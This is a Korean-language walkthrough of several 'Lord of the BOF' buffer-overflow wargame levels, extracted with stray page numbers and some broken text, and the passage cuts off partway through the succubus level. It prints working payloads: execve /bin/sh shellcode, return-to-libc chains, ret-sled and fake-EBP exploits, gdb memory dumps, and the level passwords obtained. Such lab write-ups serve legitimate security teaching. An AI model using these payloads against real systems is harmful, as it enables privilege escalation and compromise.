0xff 0xbf 0xe0 0x43 0x01 0x40 0xbffffa34: 0xf0 0x1d 0x02 0x40 0xc0 0x88 0x10 0x40 0xbffffa3c: 0x2c 0x98 0x02 0x40 0xf0 0x1d 0x02 0x40 0xbffffa44: 0x74 0xfa 0xff 0xbf 0x70 0xa9 0x00 0x
38 0xbffffa4c: 0x46 0xfc 0xff 0xbf 0xac 0xfa 0xff 0xbf 0xbffffa54: 0x20 0xd9 0x05 0x40 0xe0 0x43 0x01 0x40 0xbffffa5c: 0x74 0xfa 0xff 0xbf 0x70 0x60 0x06 0x40 0xbffffa64: 0x80 0x69 0x10 0x40 0x00 0x85 0x04 0x08 0xbffffa6c: 0x84 0xfa 0xff 0xbf 0xec 0x81 0x10 0x40 0xbffffa74: 0xac 0xfa 0xff 0xbf 0x66 0x84 0x04 0x08 0xbffffa7c: 0x00 0x85 0x04 0x08 0x84 0xfa 0xff 0xbf 아까넣은 nop가보입니다! 이걸토대로다시공격을시도해보겠습니다. 7c를넣는다면 esp는 main의 leave작업으로인해 4만큼증가하여 0xbffffa80이되고그곳엔 0x84 0xfa 0xff 0xbf가존재하므로 golem]$./ddrkknight $(python -c 'print "\x90"*16+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x6 8\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x7c"') 1?h//shh/bin?S? 것???? 왠? bash$ exit exit 성공적입니다. 이제원본에시도해봅시다. [golem@localhost golem]$./darkknight $(python -c 'print "\x90"*16+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x6 8\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"+"\x7c"') 1?h//shh/bin?S? bash$ whoami darkknight bash$ id???? 왠? uid=511(golem) gid=511(golem) euid=512(darkknight) egid=512(darkknight) groups=511(golem) bash$ my-pass euid = 512 new attacker bash$ exit exit 0x0d darkknight [darkknight@localhost darkknight]$ cat bugbear.c /* */ The Lord of the BOF : The Fellowship of the BOF - bugbear - RTL1 #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[])
39 char buffer[40]; int i; if(argc < 2) printf("argv error\n"); if(argv[1][47] == '\xbf') printf("stack betrayed you!!\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); ret에 0xbf대역을줄수없으므로스택영역은사용이불가능합니다. Return into Libc를사용해야합니다. RTL관련문서는구글에 (rtl site:hackerschool.org filetype:txt) 검색하시면많이있습니다. darkknight]$ cp bugbear dlfmaanjffhgkwl darkknight]$ gdb q dlfmaanjffhgkwl system함수를이용해서풀겠습니다. (gdb) b main Breakpoint 1 at 0x (gdb) r Starting program: /home/darkknight/dlfmaanjffhgkwl system() 의주소는자신권한의아무파일이나만들어서실행후 print 해서보시면됩니다. Breakpoint 1, 0x in main () (gdb) p system $1 = <text variable, no debug info> 0x40058ae0 < libc_system> (gdb) q The program is running. Exit anyway? (y or n) y 이제 /bin/sh 인자로쓰일문자열을찾아봅시다. [darkknight@localhost darkknight]$ vi search.c #include<stdio.h> #include<stdlib.h> main char *system=0x40058ae0; while(strncmp(system,"/bin/sh",7)) system++; printf("%s is at %#x\n",system,system); [darkknight@localhost darkknight]$ gcc search search.c [darkknight@localhost darkknight]$./search /bin/sh is at 0x400fbff9 system함수인자는 ret+8부터입니다. 그사이의 4byte는 garbage나실행할마친후리턴될주소를넣으세요. -페이로드
40 [nop 44]+[system() addr 4]+[garbage 4]+[/bin/sh addr 4] darkknight]$./bugbear $(python -c 'print "\x90"*44+"\xe0\x8a\x05\x40"+"aaaa"+"\xf bash$ whoami bugbear bash$ id uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight) bash$ my-pass euid = 513 new divide bash$ exit exit Segmentation fault 0x0e bugbear [bugbear@localhost bugbear]$ cat giant.c /* The Lord of the BOF : The Fellowship of the BOF - giant - RTL2 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> main(int argc, char *argv[]) char buffer[40]; FILE *fp; char *lib_addr, *execve_offset, *execve_addr; char *ret; if(argc < 2) printf("argv error\n"); // gain address of execve fp = popen("/usr/bin/ldd /home/giant/assassin /bin/grep libc /bin/awk 'print $4'", "r"); fgets(buffer, 255, fp); sscanf(buffer, "(%x)", &lib_addr); fclose(fp); fp = popen("/usr/bin/nm /lib/libc.so.6 /bin/grep execve /bin/awk 'print $1'", "r"); fgets(buffer, 255, fp);
41 sscanf(buffer, "%x", &execve_offset); fclose(fp); execve_addr = lib_addr + (int)execve_offset; // end memcpy(&ret, &(argv[1][44]), 4); if(ret!= execve_addr) printf("you must use execve!\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); argv[1][44] 의 ret가 execve의주소와같아야합니다. 즉 execve() 를이용한 RTL을하라는문제네요. [bugbear@localhost bugbear]$ cp giant execv [bugbear@localhost bugbear]$ gdb -q execv (gdb) b main Breakpoint 1 at 0x (gdb) r Starting program: /home/bugbear/execv 저번과같이이번엔 execve() 의주소를찾아봅시다. Breakpoint 1, 0x in main () (gdb) p execve $1 = <text variable, no debug info> 0x400a9d48 < execve> (gdb) p exit $2 = void (int) 0x400391e0 <exit> (gdb) q The program is running. Exit anyway? (y or n) y exit의주소도구해봤습니다. 사실이문제는지난번의원리를이용하면간단하게풀수있습니다. [execve() addr]+[system() addr]+[exit () addr]+[/bin/sh addr] execve가호출된후리턴되는부분에 system을넣어주고다음 4바이트는 exit, 다음은 /bin/sh를넣었습니다. [bugbear@localhost bugbear]$./giant "$(python -c 'print "\x90"*44+"\x48\x9d\x0a\x40"+"\xe0\x8a\x05\x40" +"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"') 이번엔 0x0a가 0x00으로올라가기때문에스크립트앞뒤에 (double quotation) 을붙여야합니다. bash$ id;exit uid=513(bugbear) gid=513(bugbear) euid=514(giant) egid=514(giant) groups=513(bugbear) exit 마지막엔 exit가호출되기때문에 Segmentation fault가이번엔없습니다. 이렇듯연속으로호출되는원리를이용하면이런문제도쉽게풀어나갈수있습니다. system() 부분에 nop와 shellcode가있는주소를넣어서풀수도있습니다
42 이제정석 (?) 대로풀어봅시다 execve("/bin/sh", ["/bin/sh", NULL], [NULL]); execve 함수는각각인자로 /bin/sh의주소, /bin/sh의주소와널이있는공간, 널의주소를필요로합니다. 실행예제 ) main() int *a[2]; a[0]="/bin/sh"; a[1]=0; execve(a[0],a,a[1]); skeleton때의기억을되살려서 argv[0] 의쌍둥이 (?) 가스택끝자락에남은것을기억해봅시다. [bugbear@localhost bugbear]$ cp giant.c uiant.c [bugbear@localhost bugbear]$ vi uiant.c ( 권한문제로 fpopen문에서 /usr/bin/ldd /home/giant/assassin을 /usr/bin/ldd /home/bugbear/giant로변경 ) [bugbear@localhost bugbear]$ gcc -o uiant uiant.c [bugbear@localhost bugbear]$./uiant "$(python -c 'print "\x90"*44+"\x48\x9d\x0a\x40"+"aaaa"+"\xff\xff\xf f\xbf"+"\xff\xff\xff\xbf"+"\xff\xff\xff\xbf"')" Segmentation fault (core dumped) 이제 core 덤프를확인해보겠습니다. [bugbear@localhost bugbear]$ gdb -q uiant core Core was generated by `./uiant Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0x in?? () (gdb) x/64bx 0xbfffffc0 0xbfffffc0: 0x68 0x6f 0x6d 0x65 0x2f 0x62 0x75 0x67 0xbfffffc8: 0x62 0x65 0x61 0x72 0x2f 0x62 0x69 0x6e 0xbfffffd0: 0x00 0x5f 0x3d 0x2e 0x2f 0x75 0x69 0x61 0xbfffffd8: 0x6e 0x74 0x00 0x4f 0x4c 0x44 0x50 0x57 0xbfffffe0: 0x44 0x3d 0x2f 0x68 0x6f 0x6d 0x65 0x2f 0xbfffffe8: 0x62 0x75 0x67 0x62 0x65 0x61 0x72 0x2f 0xbffffff0: 0x74 0x6d 0x70 0x00 0x2e 0x2f 0x75 0x69 0xbffffff8: 0x61 0x6e 0x74 0x00 0x00 0x00 0x00 0x00 (gdb) x/5s 0xbfffffc0 0xbfffffc0: "home/bugbear/bin" 0xbfffffd1: "_=./uiant" 0xbfffffdb: "OLDPWD=/home/bugbear/tmp" 0xbffffff4: "./uiant" 0xbffffffc: " 0xbffffff4가파일명, 0xbffffffc에널이있음을확인하였습니다. /bin/sh의주소인 0x400fbff9을파일명이넣어놓는다면앞의실행예제와같은환경을만들수있습니다
43 버퍼배열이나 argv등원하는값을넣어줄수있고도중에널이있는공간이면같은환경을만들수있습니다. bugbear]$ ln -s uiant $(printf "\xf9\xbf\x0f\x40") /bin/sh가있는곳을심볼릭링크로만들었습니다. bugbear]$./$(printf "\xf9\xbf\x0f\x40") "$(python -c 'print "\x90"*44+"\x4\\x9d\x0a\x4 0"+"AAAA"+"\xf9\xbf\x0f\x40"+"\xff\xff\xff\xbf"+"\xff\xff\xff\xbf"')" Segmentation fault (core dumped) [bugbear@localhost bugbear]$ gdb -q $(printf "\xf9\xbf\x0f\x40") core Core was generated by `./ Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0x in?? () (gdb) x/5s 0xbfffffc0 0xbfffffc0: ":/home/bugbear/bin" 0xbfffffd3: "_=./ 廈 \017@" 0xbfffffdc: "OLDPWD=/home/bugbear/tmp" 0xbffffff5: "./ 廈 \017@" 0xbffffffc: "" (gdb) x/10bx 0xbffffff7 0xbffffff7: 0xf9 0xbf 0x0f 0x40 0x00 0x00 0x00 0x00 0xbfffffff: 0x00 Cannot access memory at address 0xc 이것으로 /bin/sh주소와널이존재하는포인터배열이완성되었습니다. -페이로드 [./+/bin/sh addr]+[ ]+[nop 44]+[execve() addr]+[exit() addr]+[/bin/sh addr]+[&/bin/sh+null addr]+[null addr] addr은각각 4byte입니다. [bugbear@localhost bugbear]$ ln -sf giant $(printf "\xf9\xbf\x0f\x40") 바로원본에다시링크걸고공격하겠습니다. [bugbear@localhost bugbear]$./$(printf "\xf9\xbf\x0f\x40") "$(python -c 'print "\x90"*44+"\x48\x9d\x0a\x4 0"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"+"\xf7\xff\xff\xbf"+"\xfc\xff\xff\xbf"')" 웠 bash$ whoami giant bash$ id uid=513(bugbear) gid=513(bugbear) euid=514(giant) egid=514(giant) groups=513(bugbear) bash$ my-pass euid = 514 one step closer bash$ exit exit 0x0f giant [giant@localhost giant]$ cat assassin.c
44 /* */ The Lord of the BOF : The Fellowship of the BOF - assassin - no stack, no RTL #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) char buffer[40]; if(argc < 2) printf("argv error\n"); if(argv[1][47] == '\xbf') printf("stack retbayed you!\n"); if(argv[1][47] == '\x40') printf("library retbayed you, too!!\n"); strcpy(buffer, argv[1]); printf("%s\n", buffer); // buffer+sfp hunter memset(buffer, 0, 44); 스택사용불가, 라이브러리사용불가입니다. bugbear.c의 printf문은 betrayed( 배신 ) 이라써져있는데여긴 retbayed라되있는걸보면오타인것같습니다. [giant@localhost giant]$ cp assassin bssbssin [giant@localhost giant]$ gdb -q bssbssin (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %esp,%ebp 0x <main+3>: sub $0x28,%esp 0x <main+6>: cmpl $0x1,0x8(%ebp)
45 0x804847a <main+10>: jg 0x <main+35> 0x804847c <main+12>: push $0x x <main+17>: call 0x <printf> 0x <main+22>: add $0x4,%esp 0x <main+25>: push $0x0 0x804848b <main+27>: call 0x <exit> 0x <main+32>: add $0x4,%esp 0x <main+35>: mov 0xc(%ebp),%eax 0x <main+38>: add $0x4,%eax 0x <main+41>: mov (%eax),%edx 0x804849b <main+43>: add $0x2f,%edx 0x804849e <main+46>: cmpb $0xbf,(%edx) 0x80484a1 <main+49>: jne 0x80484c0 <main+80> 0x80484a3 <main+51>: push $0x804857c 0x80484a8 <main+56>: call 0x <printf> 0x80484ad <main+61>: add $0x4,%esp 0x80484b0 <main+64>: push $0x0 0x80484b2 <main+66>: call 0x <exit> 0x80484b7 <main+71>: add $0x4,%esp 0x80484ba <main+74>: lea 0x0(%esi),%esi 0x80484c0 <main+80>: mov 0xc(%ebp),%eax 0x80484c3 <main+83>: add $0x4,%eax 0x80484c6 <main+86>: mov (%eax),%edx 0x80484c8 <main+88>: add $0x2f,%edx 0x80484cb <main+91>: cmpb $0x40,(%edx) 0x80484ce <main+94>: jne 0x80484e7 <main+119> 0x80484d0 <main+96>: push $0x x80484d5 <main+101>: call 0x <printf> 0x80484da <main+106>: add $0x4,%esp 0x80484dd <main+109>: push $0x0 ---Type <return> to continue, or q <return> to quit--- 0x80484df <main+111>: call 0x <exit> 0x80484e4 <main+116>: add $0x4,%esp 0x80484e7 <main+119>: mov 0xc(%ebp),%eax 0x80484ea <main+122>: add $0x4,%eax 0x80484ed <main+125>: mov (%eax),%edx 0x80484ef <main+127>: push %edx 0x80484f0 <main+128>: lea 0xffffffd8(%ebp),%eax 0x80484f3 <main+131>: push %eax 0x80484f4 <main+132>: call 0x80483a8 <strcpy> 0x80484f9 <main+137>: add $0x8,%esp 0x80484fc <main+140>: lea 0xffffffd8(%ebp),%eax 0x80484ff <main+143>: push %eax 0x <main+144>: push $0x80485ae 0x <main+149>: call 0x <printf> 0x804850a <main+154>: add $0x8,%esp
46 0x804850d <main+157>: push $0x2c 0x804850f <main+159>: push $0x0 0x <main+161>: lea 0xffffffd8(%ebp),%eax 0x <main+164>: push %eax 0x <main+165>: call 0x <memset> 0x804851a <main+170>: add $0xc,%esp 0x804851d <main+173>: leave 0x804851e <main+174>: ret 0x804851f <main+175>: nop End of assembler dump. (gdb) b *main+174 Breakpoint 1 at 0x804851e (gdb) r $(python -c 'print "\x1e\x85\x04\x08"*12') Starting program: /home/giant/bssbssin $(python -c 'print "\x1e\x85\x04\x08"*12') ꠙ ret에 bp걸고리턴어드레스를 ret 부분에놓아줬습니다. Breakpoint 1, 0x804851e in main () (gdb) info reg ebp esp eip ebp 0x0 0 esp 0xbffffb2c eip 0x804851e (gdb) nexti 0x804851e in main () (gdb) info reg ebp esp eip ebp 0x0 0 esp 0xbffffb eip 0x804851e 이와같이 ret이한번수행되면 pop eip로인해 esp 4만큼증가하게됩니다. 그러므로다시한번리턴어드레스부분에 ret instruction의주소인 0x804851e를줘서 ret를호출하면 esp가 4byte 증가하였기때문에리턴주소에서 4byte 이후에존재하는주소를 eip로쓸수있습니다. -페이로드 [ret instruction addr 12]+[system()addr 4]+[exit() addr 4]+[/bin/sh addr 4] [giant@localhost giant]$ cp assassin bssbssin 사본을만들어그대로시도해보겠습니다. [giant@localhost giant]$ gdb -q bssbssin (gdb) b *main+173 Breakpoint 1 at 0x804851d (gdb) r $(python -c 'print "\x1e\x85\x04\x08"*12+"\xe0\x8a\x05\x40\xe0\x91\x03\x40\xf9\xbf\x0f\x40"') Starting program: /home/giant/bssbssin $(python -c 'print "\x1e\x85\x04\x08"*12+"\xe0\x8a\x05\x40\xe0 \x91\x03\x40\xf9\xbf\x0f\x40"')?@?ꠗ@ Breakpoint 1, 0x804851d in main () (gdb) info reg ebp esp eip ebp 0xbffffb esp 0xbffffaf
47 eip 0x804851d (gdb) nexti 0x804851e in main () (gdb) info reg ebp esp eip ebp 0x0 0 esp 0xbffffb1c eip 0x804851e (gdb) nexti 0x804851e in main () (gdb) info reg ebp esp eip ebp 0x0 0 esp 0xbffffb eip 0x804851e (gdb) nexti bash$ shell? sh: shell?: command not found bash$ ps PID TTY TIME CMD 6303 pts/1 00:00:00 bash 6367 pts/1 00:00:00 gdb 6368 pts/1 00:00:00 bssbssin 6370 pts/1 00:00:00 sh 6372 pts/1 00:00:00 ps bash$ exit exit 이와같이 gdb 내부에서도쉘이실행됩니다. :) Program exited normally. (gdb) q 이번엔그동안배운걸응용해서끝낼재미있게 (?) 끝내보죠 [giant@localhost giant]$./assassin $(python -c 'print "\x1e\x85\x04\x08"*1200+"\xe0\x8a\x05\x40"*2+"\xf9 \xbf\x0f\x40"*2') - ====== 중 = 간 == 생 = 략 ======?@?@ bash$ whoami;id;exit assassin uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant) exit 이런 my-pass를깜빡하고나가버렸습니다ㅠ. ㅠ bash$ my-pass;exit euid = 515 pushing me away exit = 사실다시 system(/bin/sh) 호출 ;D Segmentation fault 대신 exit() 를넣을수없기때문에세그폴을면할순없습니다. :p
48 0x10 assassin assassin]$ bash2 assassin]$ cat zombie_assassin.c /* The Lord of the BOF : The Fellowship of the BOF - zombie_assassin - FEBP */ #include <stdio.h> #include <stdlib.h> main(int argc, char *argv[]) char buffer[40]; if(argc < 2) printf("argv error\n"); if(argv[1][47] == '\xbf') printf("stack retbayed you!\n"); if(argv[1][47] == '\x40') printf("library retbayed you, too!!\n"); // strncpy instead of strcpy! strncpy(buffer, argv[1], 48); printf("%s\n", buffer); strncpy함수로 buffer배열에복사되는길이를 48로제한하고있습니다. 위에주석처럼 Fake_EBP를써서풀어야합니다. [assassin@localhost assassin]$ export shellcode="$(python -c 'print "\x90"*150+"\x31\xc0\x50\x68\x2f\x2f \x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"') 풀이에서환경변수를이용해본적이없으니이참에한번써봐야겠습니다. [assassin@localhost assassin]$ vi getenv.c [assassin@localhost assassin]$ gcc -o getenv getenv.c getenv.c의내용은 main(int argc, char *argv[]) printf( %#x\n,getenv(argv[1])); 입니다
49 이걸로대강환경변수주소를구할수있습니다. ( 오차는 nop가알아서 ) [assassin@localhost assassin]$./getenv shellcode 0xbffffed6 fake ebp 관련문서는역시구글에검색 ( fake_ebp site:hackerschool.org filetype:txt ) 하면많이나옵니다. -페이로드 [ret addr 4]+[nop 36]+[fake_ebp 4]+[leave instruction 4] 원리는간단하게설명하겠습니다. leave instruction에의해 pop ebp가수행될때 sfp에있던값이 ebp로들어가고 pop eip로인해 ret에넣어줬던 leave instruction의주소가 eip로들어가다시 leave 명령이실행되는데이때 ebp엔 전에넣어준 ebp 가있어서그 ebp를 esp로옮기고 pop ebp를수행하게되면 4가증가된 esp가남습니다. 다시 ret 에의해 esp에있는값을참조하여리턴됩니다. 그러므로 sfp+4를한값이리턴할주소입니다. [assassin@localhost assassin]$ cp zombie_assassin kombie_assassin [assassin@localhost assassin]$./kombie_assassin $(python -c 'print "\xd6\xfe\xff\xbf"+"\x90"*36+"\xef\xbe \xad\xde"+"leave"') 蓼? 絶?eavꠓ Segmentation fault (core dumped) 0xbffffed6이들어있는버퍼의주소를구해야합니다. [assassin@localhost assassin]$ ls core getenv getenv.c kombie_assassin zombie_assassin zombie_assassin.c [assassin@localhost assassin]$ rm -f core [assassin@localhost assassin]$ gdb -q zombie_assassin (gdb) disas main Dump of assembler code for function main: 0x <main>: push %ebp 0x <main+1>: mov %esp,%ebp 0x <main+3>: sub $0x28,%esp 0x <main+6>: cmpl $0x1,0x8(%ebp) 0x804844a <main+10>: jg 0x <main+35> 0x804844c <main+12>: push $0x x <main+17>: call 0x <printf> 0x <main+22>: add $0x4,%esp 0x <main+25>: push $0x0 0x804845b <main+27>: call 0x <exit> 0x <main+32>: add $0x4,%esp 0x <main+35>: mov 0xc(%ebp),%eax 0x <main+38>: add $0x4,%eax 0x <main+41>: mov (%eax),%edx 0x804846b <main+43>: add $0x2f,%edx 0x804846e <main+46>: cmpb $0xbf,(%edx) 0x <main+49>: jne 0x <main+80> 0x <main+51>: push $0x804854c 0x <main+56>: call 0x <printf> 0x804847d <main+61>: add $0x4,%esp 0x <main+64>: push $0x0 0x <main+66>: call 0x <exit> 0x <main+71>: add $0x4,%esp
50 0x804848a <main+74>: lea 0x0(%esi),%esi 0x <main+80>: mov 0xc(%ebp),%eax 0x <main+83>: add $0x4,%eax 0x <main+86>: mov (%eax),%edx 0x <main+88>: add $0x2f,%edx 0x804849b <main+91>: cmpb $0x40,(%edx) 0x804849e <main+94>: jne 0x80484b7 <main+119> 0x80484a0 <main+96>: push $0x x80484a5 <main+101>: call 0x <printf> 0x80484aa <main+106>: add $0x4,%esp 0x80484ad <main+109>: push $0x0 0x80484af <main+111>: call 0x <exit> ---Type <return> to continue, or q <return> to quit--- 0x80484b4 <main+116>: add $0x4,%esp 0x80484b7 <main+119>: push $0x30 0x80484b9 <main+121>: mov 0xc(%ebp),%eax 0x80484bc <main+124>: add $0x4,%eax 0x80484bf <main+127>: mov (%eax),%edx 0x80484c1 <main+129>: push %edx 0x80484c2 <main+130>: lea 0xffffffd8(%ebp),%eax 0x80484c5 <main+133>: push %eax 0x80484c6 <main+134>: call 0x <strncpy> 0x80484cb <main+139>: add $0xc,%esp 0x80484ce <main+142>: lea 0xffffffd8(%ebp),%eax 0x80484d1 <main+145>: push %eax 0x80484d2 <main+146>: push $0x804857e 0x80484d7 <main+151>: call 0x <printf> 0x80484dc <main+156>: add $0x8,%esp 0x80484df <main+159>: leave 0x80484e0 <main+160>: ret 0x80484e1 <main+161>: nop 0x80484e2 <main+162>: nop 0x80484e3 <main+163>: nop 0x80484e4 <main+164>: nop 0x80484e5 <main+165>: nop 0x80484e6 <main+166>: nop 0x80484e7 <main+167>: nop 0x80484e8 <main+168>: nop 0x80484e9 <main+169>: nop 0x80484ea <main+170>: nop 0x80484eb <main+171>: nop 0x80484ec <main+172>: nop 0x80484ed <main+173>: nop 0x80484ee <main+174>: nop 0x80484ef <main+175>: nop End of assembler dump
51 (gdb) q [assassin@localhost assassin]$./kombie_assassin $(python -c 'print "\xd6\xfe\xff\xbf"+"\x90"*36+"\xef\xbe \xad\xde"+"\xdf\x84\x04\x08"') 蓼? 絶泗 ꠓ Segmentation fault (core dumped) leave instruction을넣어주고덤프된코어를까봅니다. [assassin@localhost assassin]$ gdb -q kombie_assassin core Core was generated by `./kombie_assassin 蓼? 絶泗 '. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Reading symbols from /lib/ld-linux.so.2...done. #0 0x80484df in main () (gdb) x/x $esp 0xbffff9f0: 0x (gdb) x/120bx 0xbffff9f0 0xbffff9f0: 0x02 0x00 0x00 0x00 0x34 0xfa 0xff 0xbf 0xbffff9f8: 0x40 0xfa 0xff 0xbf 0x68 0x38 0x01 0x40 0xbffffa00: 0x02 0x00 0x00 0x00 0x90 0x83 0x04 0x08 0xbffffa08: 0x00 0x00 0x00 0x00 0xb1 0x83 0x04 0x08 0xbffffa10: 0x40 0x84 0x04 0x08 0x02 0x00 0x00 0x00 0xbffffa18: 0x34 0xfa 0xff 0xbf 0xe4 0x82 0x04 0x08 0xbffffa20: 0x1c 0x85 0x04 0x08 0x60 0xae 0x00 0x40 0xbffffa28: 0x2c 0xfa 0xff 0xbf 0x90 0x3e 0x01 0x40 0xbffffa30: 0x02 0x00 0x00 0x00 0x42 0xfb 0xff 0xbf 0xbffffa38: 0x54 0xfb 0xff 0xbf 0x00 0x00 0x00 0x00 0xbffffa40: 0x85 0xfb 0xff 0xbf 0x98 0xfb 0xff 0xbf 0xbffffa48: 0xb1 0xfb 0xff 0xbf 0xd0 0xfb 0xff 0xbf 0xbffffa50: 0xf2 0xfb 0xff 0xbf 0x00 0xfc 0xff 0xbf 0xbffffa58: 0xc3 0xfd 0xff 0xbf 0xe2 0xfd 0xff 0xbf 0xbffffa60: 0x00 0xfe 0xff 0xbf 0x15 0xfe 0xff 0xbf ====== 중 = 략 ====== 0xbffffae0: 0x03 0x02 0x00 0x00 0x0c 0x00 0x00 0x00 0xbffffae8: 0x03 0x02 0x00 0x00 0x0d 0x00 0x00 0x00 0xbffffaf0: 0x03 0x02 0x00 0x00 0x0e 0x00 0x00 0x00 0xbffffaf8: 0x03 0x02 0x00 0x00 0x10 0x00 0x00 0x00 0xbffffb00: 0xff 0xfb 0xeb 0x0f 0x0f 0x00 0x00 0x00 0xbffffb08: 0x3d 0xfb 0xff 0xbf 0x00 0x00 0x00 0x00 0xbffffb10: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb18: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb20: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb28: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb30: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbffffb38: 0x00 0x00 0x00 0x00 0x00 0x69 0x36 0x38 0xbffffb40: 0x36 0x00 0x2e 0x2f 0x6b 0x6f 0x6d 0x62 0xbffffb48: 0x69 0x65 0x5f 0x61 0x73 0x73 0x61 0x
52 0xbffffb50: 0x73 0x69 0x6e 0x00 0xd6 0xfe 0xff 0xbf (gdb) 0xbffffb58: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffffb60: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffffb68: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffffb70: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbffffb78: 0x90 0x90 0x90 0x90 0xef 0xbe 0xad 0xde 0xbffffb80: 0xdf 0x84 0x04 0x08 0x00 0x50 0x57 0x44 0xbffffb88: 0x3d 0x2f 0x68 0x6f 0x6d 0x65 0x2f 0x61 0xbffffb90: 0x73 0x73 0x61 0x73 0x73 0x69 0x6e 0x00 0xbffffb98: 0x52 0x45 0x4d 0x4f 0x54 0x45 0x48 0x4f 0xbffffba0: 0x53 0x54 0x3d 0x31 0x39 0x32 0x2e 0x31 0xbffffba8: 0x36 0x38 0x2e 0x31 0x33 0x37 0x2e 0x31 0xbffffbb0: 0x00 0x48 0x4f 0x53 0x54 0x4e 0x41 0x4d 0xbffffbb8: 0x45 0x3d 0x6c 0x6f 0x63 0x61 0x6c 0x68 0xbffffbc0: 0x6f 0x73 0x74 0x2e 0x6c 0x6f 0x63 0x61 0xbffffbc8: 0x6c 0x64 0x6f 0x6d 0x61 0x69 0x6e 0x00 (gdb) q 엔터 3번눌렀더니넣어줬던 0xbffffed6과 nop가보입니다. 리턴주소로쓸부분에서 4를뺀값을 ebp에넣어줍니다. [assassin@localhost assassin]$./kombie_assassin $(python -c 'print "\xd6\xfe\xff\xbf"+"\x90"*36+"\x50\xfb \xff\xbf"+"\xdf\x84\x04\x08"') 蓼?P? 욀ꠓ bash$ ok;exit sh: ok: command not found exit 잘됩니다. 이제원본에시도하죠. [assassin@localhost assassin]$./zombie_assassin $(python -c 'print "\xd6\xfe\xff\xbf"+"\x90"*36+"\x50\xfb \xff\xbf"+"\xdf\x84\x04\x08"') 蓼?P? 욀ꠓ bash$ whoami;id;my-pass; zombie_assassin uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassi n) euid = 516 no place to hide 0x11 zombie_assassin login: zombie_assassin Password: Last login: Wed Mar 14 19:52:08 from [zombie_assassin@localhost zombie_assassin]$ cat succubus.c /* The Lord of the BOF : The Fellowship of the BOF - succubus - calling functions continuously
53 */ #include <stdio.h> #include <stdlib.h> // the inspector int check = 0; void MO(char *cmd) if(check!= 4) printf("welcome to the MO!\n"); // olleh! system(cmd); void YUT(void) if(check!= 3) printf("welcome to the YUT!\n"); check = 4; void GUL(void) if(check!= 2) printf("welcome to the GUL!\n"); check = 3; void GYE(void) if(check!= 1) printf("welcome to the GYE!\n"); check = 2;
54 void DO(void) printf("welcome to the DO!\n"); check = 1; main(int argc, char *argv[]) char buffer[40]; char *addr; if(argc < 2) printf("argv error\n"); // you cannot use library if(strchr(argv[1], '\x40')) printf("you cannot use library\n"); // check address addr = (char *)&DO; if(memcmp(argv[1]+44, &addr, 4)!= 0) printf("you must fall in love with DO\n"); // overflow! strcpy(buffer, argv[1]); printf("%s\n", buffer); // stack destroyer // 100 : extra space for copied argv[1] memset(buffer, 0, 44); memset(buffer , 0, 0xbfffffff - (int)(buffer )); // LD_* eraser // 40 : extra space for memset function memset(buffer-3000, 0, ); 소스가상당히기네요. ret이후의 100Byte만사용남겨두고 0으로덮습니다. 주석대로함수를연속해서호출해야합니다. DO, GYE, GUL, YUT, MO 순서대로호출하여 check를증가시킵니다. 모까지호출하면드디어인자를입력받습니다. 하지만쉘이있는곳의주소를줘야되는데라이브러리영역은사용불가능하고환경변수도초기화되므로남은영역인스택에직접값을넣어주고리턴주소를잡아야합니다
55 그럼 nm 명령어를이용해서함수들의주소를확인해보겠습니다. zombie_assassin]$ nm succubus ec T DO c T GUL bc T GYE T MO c T YUT 08049ae4? _DYNAMIC 08049aa8? _GLOBAL_OFFSET_TABLE_ R _IO_stdin_used 08049a9c? CTOR_END 08049a98? CTOR_LIST 08049aa4? DTOR_END 08049aa0? DTOR_LIST 08049a94? EH_FRAME_BEGIN 08049a94? FRAME_END 08049b84 A bss_start 08049a84 D data_start w deregister_frame_info@@glibc_ t do_global_ctors_aux c0 t do_global_dtors_aux w gmon_start U libc_start_main@@glibc_2.0 w register_frame_info@@glibc_ b84 A _edata 08049b9c A _end c A _etext c? _fini U _fp_hw c? _init T _start 08049a90 D check 08049a8c d completed a84 W data_start T dumpcode U exit@@glibc_ t fini_dummy 08049a90 d force_to_data 08049a94 d force_to_data t frame_dummy b4 t gcc2_compiled c0 t gcc2_compiled t gcc2_compiled c t gcc2_compiled t gcc2_compiled t init_dummy
